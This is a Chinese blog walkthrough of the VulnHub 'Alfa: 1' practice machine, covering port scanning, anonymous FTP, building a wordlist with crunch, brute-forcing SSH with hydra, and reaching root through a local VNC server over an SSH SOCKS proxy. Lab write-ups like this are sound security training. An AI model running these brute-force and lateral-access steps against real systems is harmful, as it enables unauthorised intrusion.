Alfa: 1 vulnhub walkthrough

本文详细记录了在Vulnhub平台的Alfa 1挑战中的破解过程,包括端口扫描、通过FTP匿名访问获取milo.jpg图片,利用目录遍历技巧和密码字典进行Hydra爆破得到SSH登录凭证,进而获取第一个flag。在获取shell后,尝试多种提权手段未果,最后发现VNC服务器并利用SSH代理成功登陆,拿到root权限,获取第二个flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息页:http://www.vulnhub.com/entry/alfa-1,655/
关键字:Enumeration | Web Application | Brute Force | Privilege Escalation

0x01 端口扫描

PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
65111/tcp open  unknown

0x02 获取第一个flag

使用anonymous访问ftp,获取到名为milo.jpg的图片。
milo
访问80端口,通过目录遍历,在页面http://192.168.56.157/alfa-support/中得到提示信息:
hint于是利用之前图片名通过crunch构建密码字典,hydra爆破得到密码milo666

kali@kali:~$ crunch 7 7 -t milo%%% > 1.txt
Crunch will now generate the following number of lines: 1000
kali@kali:~$ hydra -l thomas -P 1.txt ssh://192.168.56.157:65111
[65111][ssh] host: 192.168.56.157   login: thomas   password: milo666

利用ssh登录,得到第一个flag。
flag1

0x03 获取第二个flag

获取shell后一顿常规操作,比如suid,sudo,crontab,备份密码文件等,都以失败告终,反过来回到开始的地方,在用户目录中有一个敏感文件.remote_secret
secret
同时进程中存在vncserver。
vnc估计上述密码文件是用来登录vnc的,但是由于vncserver仅限本地登录,所以这里使用ssh做了socks5代理,在kali下利用vncview加载密码文件实现了root权限获取,得到了第二个flag。
root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值